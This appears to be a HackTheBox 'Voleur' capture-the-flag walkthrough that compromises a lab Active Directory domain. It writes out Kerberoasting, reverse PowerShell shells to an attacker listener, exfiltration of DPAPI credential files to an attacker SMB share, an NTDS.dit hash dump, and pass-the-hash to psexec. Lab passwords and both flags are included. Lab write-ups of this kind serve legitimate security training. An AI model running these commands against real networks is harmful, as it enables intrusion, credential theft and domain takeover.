HackTheBox | Voleur

In this walkthrough, I demonstrate how I obtained complete ownership of Voleur on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Medium Challenge

Nmap Results

# Nmap 7.95 scan initiated Mon Jul  7 18:11:18 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.57.144
Nmap scan report for 10.129.57.144
Host is up (0.016s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-08 06:12:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
61513/tcp open  msrpc         Microsoft Windows RPC
61519/tcp open  msrpc         Microsoft Windows RPC
61540/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-08T06:13:24
|_  start_date: N/A
|_clock-skew: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  7 18:14:00 2025 -- 1 IP address (1 host up) scanned in 162.13 seconds
💡
Don't miss the breadcrumbs in the initial nmap output. The LDAP banner gives us the domain (voleur.htb); SMB signing is required; the clock skew of 7h59m59s is far outside the five-minute window Kerberos tolerates, so every Kerberos command later on needs a faketime wrapper or a synced clock; and an OpenSSH/Ubuntu banner on port 2222 of a Windows host hints at WSL. We can also query the DNS hostname from the domain controller and add it to our /etc/hosts file.
sudo nmap -Pn -p389 --script ldap-rootdse 10.129.57.144 | grep dnsHostName
echo -e '10.129.57.144\t\tDC.voleur.htb voleur.htb' | sudo tee -a /etc/hosts





Service Enumeration

ℹ️
This is an assumed breach penetration test and credentials have been provided: ryan.naylor / HollowOct31Nyt.

TCP/445

Test Authentication

smbclient -U 'VOLEUR.HTB/ryan.naylor%HollowOct31Nyt' -L //DC.voleur.htb
I've seen this before and I suspect that NTLM authentication may be disabled
(See my Kerberos Authentication notes, which cover NetExec with a KRB5CCNAME ticket cache, for the setup.)

Set up your:

  • /etc/hosts file
  • Kerberos configuration file

Then, retry...

kinit ryan.naylor
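The two pieces of client-side setup the steps above depend on, as an added example (this is my editorial script, not the author's wrapper or the notes linked above): a generator for the Kerberos configuration file, and a converter from the clock-skew value nmap reported into the offset that libfaketime needs. Assumptions: the realm is VOLEUR.HTB with KDC DC.voleur.htb (from the nmap output), libfaketime is installed as the faketime command, and the skew string is the one in the scan.

```sh
#!/bin/sh
# Added example (not the author's wrapper). Assumptions: realm VOLEUR.HTB with
# KDC DC.voleur.htb as found by nmap, libfaketime installed as `faketime`, and
# the skew string is the one nmap reported.

# Print a minimal /etc/krb5.conf for a single AD realm. Realm names are
# upper-case in Kerberos; the [domain_realm] mapping lets GSSAPI clients
# (smbclient, ldapsearch, evil-winrm) derive the realm from DC.voleur.htb.
krb5_conf() {
  realm=$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')
  domain=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  kdc=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
  cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# Turn nmap's clock-skew value ("7h59m59s", "-3m20s", "1d2h") into a signed
# number of seconds. The KDC rejects requests whose timestamp is more than
# five minutes off its own clock, so 7h59m59s has to be compensated.
skew_to_seconds() {
  s=$1
  sign=''
  case "$s" in
    -*) sign='-'; s=${s#-} ;;
    +*) s=${s#+} ;;
  esac
  # "7h59m59s" -> "7*3600+59*60+59+" ; the trailing 0 closes the last "+"
  expr=$(printf '%s' "$s" | sed -E 's/([0-9]+)d/\1*86400+/g; s/([0-9]+)h/\1*3600+/g; s/([0-9]+)m/\1*60+/g; s/([0-9]+)s/\1+/g')
  echo "${sign}$(( ${expr}0 ))"
}

# Run one command with the clock shifted by the target's skew, e.g.
#   skewed 7h59m59s kinit ryan.naylor
# libfaketime treats a bare signed number as an offset in seconds, and only
# the child process sees the shifted clock, so the attack box's own time
# (and its logs) stay correct.
skewed() {
  offset=$(skew_to_seconds "$1"); shift
  case "$offset" in -*) ;; *) offset="+$offset" ;; esac
  faketime "$offset" "$@"
}

# Demo: print the config (pipe it to `sudo tee /etc/krb5.conf`) and the offset.
krb5_conf voleur.htb DC.voleur.htb
echo "offset for faketime: $(skew_to_seconds 7h59m59s) seconds"
```

The alternative is `sudo ntpdate DC.voleur.htb`, which moves the whole system clock; the wrapper keeps the shift local to one process, which is kinder to your own timestamps and lets you work against several targets with different skews at once.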



List Shares

smbclient --use-kerberos=required -L //DC.voleur.htb
Much better...

Some interesting shares that we may have access to:

  • HR
  • Finance
  • IT

I highly doubt we'll have access to C$ or ADMIN$ given this is a CTF and that'd be too easy.

smbclient --use-kerberos=required //DC.voleur.htb/HR

Map the HR share and explore

smbclient --use-kerberos=required //DC.voleur.htb/Finance

Same for Finance

smbclient --use-kerberos=required //DC.voleur.htb/IT

Same for IT

No read/write access to HR or Finance
"Access_Review.xlsx" sounds interesting...
smb: \> cd "First-Line Support\"
smb: \> get Access_Review.xlsx



Crack the Encrypted File

That doesn't look like a normal Excel file...
pipx install msoffcrypto-tool

Install msoffcrypto-tool to attempt to crack the file

grep -vEa "\"|'" ~/Pentest/WordLists/rockyou.txt > wordlist.txt

Create a wordlist from rockyou.txt and filter out quotes, since they break the quoting inside the xargs command below

xargs -P 10 -I {} bash -c '/home/ben/.local/bin/msoffcrypto-tool Access_Review.xlsx cracked.xlsx -p "$1" 2>/dev/null && echo "Cracked with password: $1"' _ {} < wordlist.txt

Use the full path to msoffcrypto-tool when using the bash -c sub-shell command. The candidate password is handed to the sub-shell as a positional argument ($1) rather than pasted into the command string: substituting {} straight into a double-quoted string would let a wordlist entry containing $ or backticks be expanded or executed by bash. msoffcrypto-tool exits non-zero on a wrong password, which is what the && relies on. A faster route is office2john.py (shipped with John) to extract the document hash and crack it with john or hashcat, instead of spawning one decryption process per candidate.

Now, decrypt using the correct password
Much better
Lots of valuable info here!



Assemble Facts and Test Credentials

  • We already have the password for ryan.naylor, but interestingly the document says the account has Kerberos pre-authentication disabled (AS-REP roastable, though moot since we already hold the password)
  • todd.wolfe:NightT1meP1dg3on14 (supposedly deleted, but may be able to restore)
  • jeremy.combs — can access Software folder
  • svc_ldap:M1XyC9pW7qT5Vn — likely service principal for LDAP
  • svc_iis:N5pXyW1VqM7CZ8 — likely service principal for web server
faketime nxc smb DC.voleur.htb -d 'voleur.htb' -u users.txt -p pass.txt -k --continue-on-success

Using my faketime wrapper function (documented in my notes) so the Kerberos requests are stamped with the DC's clock, which the nmap scan showed is almost eight hours ahead of ours

All known users and passwords
Valid credentials found for three accounts



TCP/389

Now that we have some valuable intelligence, let's expand the attack surface a bit more by pulling some more data from LDAP.

Manual Enumeration

ldapsearch -Q -Y GSSAPI -o ldif-wrap=no -H 'ldap://DC.voleur.htb' -b 'DC=voleur,DC=htb' '(objectClass=user)' > ldap_users.txt

Retrieve users from LDAP

ldapsearch -Q -Y GSSAPI -o ldif-wrap=no -H 'ldap://DC.voleur.htb' -b 'DC=voleur,DC=htb' '(objectClass=group)' > ldap_groups.txt

Retrieve groups from LDAP

while read -r group ; do echo -e "${group}\n" ; ldapsearch -Q -Y GSSAPI -o ldif-wrap=no -H ldap://DC.voleur.htb -b 'DC=voleur,DC=htb' "(sAMAccountName=${group})" | grep 'member: ' ; echo '' ; done < <(grep '^sAMAccountName: ' ldap_groups.txt | cut -d ':' -f 2- | sed 's/^ //')

Retrieve members of each group from LDAP
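An added example (mine, not part of the original post) that does the group-membership mapping offline from the LDIF already saved in ldap_groups.txt, so one ldapsearch replaces the per-group loop above. It assumes the dump was taken with -o ldif-wrap=no; without that, any value longer than 76 columns (member DNs usually are) is folded onto a continuation line and a plain grep misses it. The LDIF embedded below is constructed sample data for the demo, not what the box actually returned.

```sh
#!/bin/sh
# Added example, not from the original post. Parses unwrapped ldapsearch LDIF.
# The entries below are constructed for the demo (DNs and membership are made
# up, not the box's real data).

SAMPLE_LDIF=$(cat <<'EOF'
dn: CN=Restore_Users,OU=Groups,DC=voleur,DC=htb
objectClass: group
sAMAccountName: Restore_Users
member: CN=svc_ldap,OU=Service Accounts,DC=voleur,DC=htb

dn: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
objectClass: group
sAMAccountName: Remote Management Users
member: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb

dn: CN=Second-Line Technicians,OU=Groups,DC=voleur,DC=htb
objectClass: group
sAMAccountName: Second-Line Technicians
member: CN=lacey.miller,OU=Second-Line Support,DC=voleur,DC=htb
member: CN=jeremy.combs,OU=Second-Line Support,DC=voleur,DC=htb
EOF
)

# Print "group<TAB>member DN" for every member of every group in an LDIF file.
# LDIF entries are separated by blank lines, so we collect one entry at a time.
ldif_group_members() {
  awk '
    function flush(   i) {
      for (i = 1; i <= n; i++) print name "\t" members[i]
      n = 0; name = ""; split("", members)
    }
    /^$/                { flush(); next }
    /^sAMAccountName: / { name = substr($0, 17); next }
    /^member: /         { members[++n] = substr($0, 9); next }
    END                 { flush() }
  ' "$1"
}

# Reverse lookup: which groups contain a given DN (DNs compare case-insensitively).
ldif_groups_of() {
  ldif_group_members "$1" | awk -F'\t' -v dn="$2" 'tolower($2) == tolower(dn) { print $1 }'
}

# Demo on the constructed sample (the temp file is left for inspection).
SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_LDIF" > "$SAMPLE_FILE"
ldif_group_members "$SAMPLE_FILE"
```

Point it at ldap_groups.txt instead of the sample file and pipe through `sort` to get the same tiered view as the loop, with the bonus that nested groups show up as member DNs of other groups.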

Users with WinRM access
I wrote about this in the HTB Vintage box, worth exploring more
"Tiered" access levels, but the "Restore_Users" group sounds particularly interesting

Find Deleted Objects

💡
Since we know that the svc_ldap user has some unique permissions regarding user restoration, let's get a Kerberos ticket for svc_ldap and query the deleted objects in the domain.
kdestroy
kinit svc_ldap

Enter the password for svc_ldap

ldapsearch -Q -Y GSSAPI -H 'ldap://DC.voleur.htb' -b 'CN=Deleted Objects,DC=voleur,DC=htb' -s 'sub' -E '1.2.840.113556.1.4.417' '(objectClass=*)'
Indeed, we can read the deleted objects and verify that todd.wolfe has been tombstoned. The -E '1.2.840.113556.1.4.417' option attaches the Show Deleted Objects control; without it the container appears empty, and listing it at all needs read rights on CN=Deleted Objects that, by default, only administrators hold.
ℹ️
I tried a few things to restore todd.wolfe using ldapmodify and a Python script generated with the help of AI. But, ldapmodify didn't support the extended LDAP controls and the Python script returned an LDAP error saying that svc_ldap had insufficient rights. So, I'll try and restore the user later when I get a shell on the box.



BloodHound

(See my Remote BloodHound notes, which start from the same ldap-rootdse lookup of the DC name.)
faketime nxc ldap DC.voleur.htb -d 'voleur.htb' -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' \
--dns-server 10.129.57.144 -k --bloodhound -c All

Again, using my faketime wrapper function (documented in my notes) to compensate for the clock skew

Import the .zip file to BloodHound and let's get busy
  • svc_ldap is a member of Restore_Users and has GenericWrite (or full control) over:
    • lacey.miller
      • member of "Second-Line Technicians"
      • Access Review document says she is a WinRM user, but this is not correct
    • Second-Line Support OU
  • svc_ldap also has WriteSPN on the svc_winrm account, so we could try doing some targeted kerberoasting as well
ℹ️
We also have control over ryan.naylor and svc_iis, but neither of those presented any interesting attack paths in BloodHound.



TCP/88

Since the Access_Review.xlsx document also mentioned that Kerberos pre-auth was disabled on ryan.naylor, I tried:

  • Making a list of users from the data in ldap_users.txt
  • Running impacket-GetNPUsers to see if anyone else had pre-auth disabled
  • No users were found to have this configuration

I also tried checking for Service Principals using impacket-GetUserSPNs but it seems the svc_ naming convention is just a coincidence and there are no users configured with SPNs in the domain.





Exploit

Abusing WriteSPN on svc_winrm

The WriteSPN edge means svc_ldap can set servicePrincipalName on svc_winrm. The targeted-Kerberoast tool I used adds an SPN to every account it has that right on, requests a service ticket (TGS) for the new SPN with svc_ldap's Kerberos ticket, and writes the ticket out in crackable form. john recognises the krb5tgs format on its own:
john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 hash.txt
We cracked the hash of svc_winrm



WinRM Access

kinit svc_winrm

Enter password: AFireInsidedeOzarctica980219afi

KRB5CCNAME='/tmp/krb5cc_1001' evil-winrm -i 'DC.voleur.htb' -r voleur.htb  -u 'svc_winrm'





Post-Exploit Enumeration

Operating Environment

OS & Kernel

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    SystemRoot    REG_SZ    C:\Windows
    BaseBuildRevisionNumber    REG_DWORD    0xb21
    BuildBranch    REG_SZ    fe_release
    BuildGUID    REG_SZ    ffffffff-ffff-ffff-ffff-ffffffffffff
    BuildLab    REG_SZ    20348.fe_release.210507-1500
    BuildLabEx    REG_SZ    20348.1.amd64fre.fe_release.210507-1500
    CompositionEditionID    REG_SZ    ServerStandard
    CurrentBuild    REG_SZ    20348
    CurrentBuildNumber    REG_SZ    20348
    CurrentMajorVersionNumber    REG_DWORD    0xa
    CurrentMinorVersionNumber    REG_DWORD    0x0
    CurrentType    REG_SZ    Multiprocessor Free
    CurrentVersion    REG_SZ    6.3
    DisplayVersion    REG_SZ    21H2
    EditionID    REG_SZ    ServerStandard
    EditionSubManufacturer    REG_SZ
    EditionSubstring    REG_SZ
    EditionSubVersion    REG_SZ
    InstallationType    REG_SZ    Server
    InstallDate    REG_DWORD    0x67993f82
    LCUVer    REG_SZ    10.0.20348.3807
    ProductName    REG_SZ    Windows Server 2022 Standard
    ReleaseId    REG_SZ    2009
    SoftwareType    REG_SZ    System
    UBR    REG_DWORD    0xedf
    PathName    REG_SZ    C:\Windows
    PendingInstall    REG_DWORD    0x0
    ProductId    REG_SZ    00454-20165-01481-AA962
    RegisteredOwner    REG_SZ    Windows User
    RegisteredOrganization    REG_SZ
    InstallTime    REG_QWORD    0x1db71c4224e0cec    

Current User

USER INFORMATION
----------------

User Name        SID
================ ==============================================
voleur\svc_winrm S-1-5-21-3927696377-1337352550-2781715495-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.    



Users and Groups

See ldapsearch artifacts.



Network Configurations

Network Interfaces

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.57.144
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1    

Open Ports

TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       6972

PID 6972 is the sshd listed under processes below; it binds port 22 on the host, while nmap reached it on 2222 from outside, so a port mapping we can't see from this session sits in front of it.



Processes and Services

ℹ️
We don't have access to CIM / WMI in our WinRM session, but I was still able to find some interesting things.

Interesting Processes

      0      40     1836       3600              6676   1 bash
      0      33      316       1144              6972   1 sshd
    163      10     1908       3564              5356   1 wsl
    125       7     1096       3156              6640   1 wslhost



Interesting Files

SMB Share Directories

C:\Finance
C:\HR
C:\IT





Privilege Escalation

Lateral to SVC_LDAP

Reverse PowerShell Session

(See my SMB notes: an ad-hoc SMB server on the attack box with Impacket's smbserver.py.)

Use SMB method to transfer files to target

(See my notes on spawning processes as other users with RunasCs.exe: https://github.com/antonioCoco/RunasCs/releases)

Use RunasCs.exe to spawn a shell as svc_ldap

sudo rlwrap nc -lnvp 443

Start a TCP listener

.\runascs.exe svc_ldap 'M1XyC9pW7qT5Vn' powershell.exe -r 10.10.14.161:443

Make a callback to the listener as svc_ldap



Restore Todd Wolfe

Get-ADObject -IncludeDeletedObjects -Filter 'ObjectClass -eq "User" -and Deleted -eq $true' | Restore-ADObject
Restored todd.wolfe from the recycle bin. This works because the object is still sitting in the Deleted Objects container and svc_ldap has the restore rights seen in BloodHound. Note that the filter restores every deleted user object in the domain; on a real engagement narrow it to the one account (add -and SamAccountName -eq "todd.wolfe") to avoid reviving anything else.



Reverse PowerShell as Todd Wolfe

ℹ️
Despite my best efforts to troubleshoot, I couldn't get evil-winrm to work with todd.wolfe Kerberos login. Didn't matter if I tried with kinit or impacket-getTGT.
Confirmed the login is valid for todd.wolfe, just not with WinRM for some reason
sudo rlwrap nc -lnvp 443

Start TCP listener to catch the reverse shell

.\runascs.exe 'todd.wolfe' 'NightT1meP1dg3on14' powershell.exe -r 10.10.14.161:443

Use runascs.exe in the evil-winrm shell running as svc_winrm

Appears to be an archive of Todd's directory under C:\Users
Found some DPAPI keys and creds while digging around
net use Y: \\10.10.14.161\EvilShare /user:secretuser 'secretpass'

Map my SMB server share under todd.wolfe session

cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D' Y:\dpapi_loot

Copy to dpapi_loot directory on Kali

cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3' Y:\dpapi_loot
cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88' Y:\dpapi_loot



Decrypt DPAPI Credentials

(See my notes on dumping passwords with DPAPI, starting from cmdkey /list for credential enumeration.)
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'

Decrypt the master key

Cached credential 772275FAD58525253490A9B0039791D3 is the most interesting here, as it looks like jeremy.combs' credential was saved at some point under Todd Wolfe's session. Each credential blob names the GUID of the master key that protects it, so pair blob and key file by that GUID before running impacket-dpapi credential with the decrypted key.
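The two impacket-dpapi steps chained together, as an added example of mine (not from the original post): decrypt Todd's master key with his password, then decrypt the Credentials blob with that key. The SID, password and file names are the ones found above; the output lines fed to the demo are constructed, and the exact spacing of impacket's header line is an assumption the parser tolerates.

```sh
#!/bin/sh
# Added example, not from the original post. Assumes impacket is installed and
# the loot files copied above are in the working directory. The sample output
# lines used for the demo are constructed.

SID='S-1-5-21-3927696377-1337352550-2781715495-1110'
PASSWORD='NightT1meP1dg3on14'

# The 0x... key from `impacket-dpapi masterkey` output (read from stdin).
extract_masterkey() {
  sed -n 's/^Decrypted key: *\(0x[0-9a-fA-F]*\).*/\1/p' | head -n 1
}

# The master key GUID named in a credential blob header (stdin). Running
# `impacket-dpapi credential -file <blob>` without -key dumps that header,
# which tells you which GUID file under Protect\<SID>\ you need to decrypt.
parse_blob_guid() {
  sed -n 's/^Guid *MasterKey *: *//p' | head -n 1 | tr -d '{}'
}

blob_masterkey_guid() {
  impacket-dpapi credential -file "$1" | parse_blob_guid
}

# $1 = master key file, $2 = credential blob. Prints the decrypted credential
# (target, username, password). A user's master key is encrypted with a key
# derived from the user's password and SID, which is why -sid/-password are
# enough here; without the password you would need the domain DPAPI backup
# key (a Domain Admin-only extraction).
decrypt_dpapi_credential() {
  key=$(impacket-dpapi masterkey -file "$1" -sid "$SID" -password "$PASSWORD" | extract_masterkey)
  [ -n "$key" ] || { echo "master key did not decrypt (wrong SID or password?)" >&2; return 1; }
  impacket-dpapi credential -file "$2" -key "$key"
}

# Usage against the loot copied above (needs impacket and the files):
#   guid=$(blob_masterkey_guid 772275FAD58525253490A9B0039791D3)
#   decrypt_dpapi_credential "$guid" 772275FAD58525253490A9B0039791D3
```

The reason this loot is decryptable at all is that the archive kept both halves: the Protect\<SID> master key file and the Credentials blobs. Either one without the other, or without Todd's password, is just ciphertext.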



Lateral to Jeremy Combs

faketime nxc ldap DC.voleur.htb -k -d 'voleur.htb' -u 'jeremy.combs' -p 'qT3V9pLXyN7W4m'
The credentials appear to be valid
kinit jeremy.combs
export KRB5CCNAME=/tmp/krb5cc_1001
Some interesting files
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

Note.txt.txt

id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----



Lateral to svc_backup

for user in $(cat users.txt) ; do ssh -i id_rsa -p 2222 -o BatchMode=yes -o IdentitiesOnly=yes "$user"@DC.voleur.htb id && echo "key accepted for $user" ; done
Loop through the known users with the key only (BatchMode stops ssh from falling back to a password prompt on every failure); the key is accepted for svc_backup, so log in interactively as that user
Running the mount command, we can see C: mapped to /mnt/c
find / -type f -writable 2>/dev/null | grep -vE '/proc|/sys'
These backup files look interesting...
scp -r -i id_rsa -P 2222 svc_backup@DC.voleur.htb:"/mnt/c/IT/Third-Line Support/Backups/" .

Recursively copy the files locally (the space in the remote path is quoted; if your scp client still splits it, escape it as Third-Line\ Support)

impacket-secretsdump -system Backups/registry/SYSTEM -ntds Backups/Active\ Directory/ntds.dit LOCAL

Dump the NTDS.dit file locally; the SYSTEM hive is required because the boot key stored in it protects the password encryption key that encrypts the hashes inside ntds.dit



Becoming Domain Admin

faketime impacket-getTGT -hashes ':e656e07c56d831611b577b160b259ad2' 'voleur.htb/Administrator'
Again, using my faketime wrapper function (documented in my notes) to compensate for the clock skew
KRB5CCNAME=Administrator.ccache faketime impacket-psexec -k -no-pass 'voleur.htb/Administrator'@DC.voleur.htb



Flags

User

83a68a24fa951a0769e3fb93b2b5b94c    

Root

fc20fd8ee300307c6f7744bf126cec9e    